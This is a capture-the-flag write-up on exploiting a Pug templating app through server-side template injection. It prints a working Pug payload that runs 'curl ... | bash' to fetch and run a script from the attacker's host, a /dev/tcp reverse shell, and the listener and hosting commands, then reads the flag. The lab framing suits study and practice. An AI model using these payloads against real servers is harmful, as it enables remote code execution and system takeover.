My favourite type of dog is a pug... and, you know what, Pug is my favourite templating engine too! I made this super slick application so you can play around with Pug and see how it works. Seriously, you can do so much with Pug!

Pug is a templating engine used to generate html. Hacktricks has information on it for deserialization and server-side template injection. Given the room name, I went with SSTI first.

Hacktricks provides an example payload that downloads and runs a shell script.

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}

All we need to do is write a reverse shell

/bin/sh -i >& /dev/tcp/LOCAL-IP/4000 0>&1

host it

python3 -m http.server

start a listener

nc -lnvp 4000

send the payload

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl LOCAL-IP:8000/s.sh | bash')}()}

shell

and check flag.txt

flag